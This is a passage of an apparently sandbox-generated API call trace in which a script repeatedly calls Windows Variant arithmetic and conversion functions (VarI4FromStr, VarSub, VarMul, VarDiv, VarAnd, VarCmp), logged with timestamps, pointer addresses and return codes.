dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.404] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.404] GetUserDefaultLCID () returned 0x409 [0069.404] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.404] GetUserDefaultLCID () returned 0x409 [0069.404] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.404] GetUserDefaultLCID () returned 0x409 [0069.404] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.404] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.404] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.404] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.404] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.404] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.404] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.404] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.405] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.405] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.405] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.405] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.405] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.405] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.405] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.405] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.405] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.405] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.405] GetUserDefaultLCID () returned 0x409 [0069.405] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.406] GetUserDefaultLCID () returned 0x409 [0069.406] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.406] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.406] GetUserDefaultLCID () returned 0x409 [0069.406] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.406] GetUserDefaultLCID () returned 0x409 [0069.406] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.406] GetUserDefaultLCID () returned 0x409 [0069.406] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.406] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.406] GetUserDefaultLCID () returned 0x409 [0069.406] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.406] GetUserDefaultLCID () returned 0x409 [0069.406] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.406] GetUserDefaultLCID () returned 0x409 [0069.406] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.406] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.406] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.406] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.406] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.407] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.407] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.407] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.407] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.407] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.407] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.407] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.407] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.407] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.407] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.407] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.407] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.407] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.407] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.407] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.407] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.407] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.407] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.407] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.407] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.407] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.408] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.408] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.408] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.408] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.408] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.408] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.408] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.408] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.408] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.408] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.408] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.409] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.409] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.409] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.409] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.409] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.409] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.409] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.409] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.409] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.409] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.409] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.409] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.409] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.409] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.409] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.409] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.409] GetUserDefaultLCID () returned 0x409 [0069.409] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.410] GetUserDefaultLCID () returned 0x409 [0069.410] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.410] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.410] GetUserDefaultLCID () returned 0x409 [0069.410] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.410] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.410] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.410] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.410] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.410] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.410] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.410] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.410] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.410] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.410] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.410] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.410] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.410] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.410] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.410] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.410] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.410] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.410] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.410] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.410] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.410] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.411] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.411] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.411] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.411] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.411] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.411] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.411] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.411] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.411] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.411] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.411] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.411] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.411] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.411] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.411] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.411] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.411] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.411] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.411] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.411] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.411] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.411] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.411] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.411] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.411] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.411] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.411] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.411] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.411] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.411] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.412] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.412] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.412] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.412] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.412] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.412] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.412] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.412] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.412] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.412] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.412] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.412] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.412] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.412] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.412] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.412] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.412] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.412] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.412] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.412] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.412] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.412] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.413] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.413] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.413] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.413] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.413] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.413] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.413] VarAdd (in: pvarLeft=0x18fb1c, 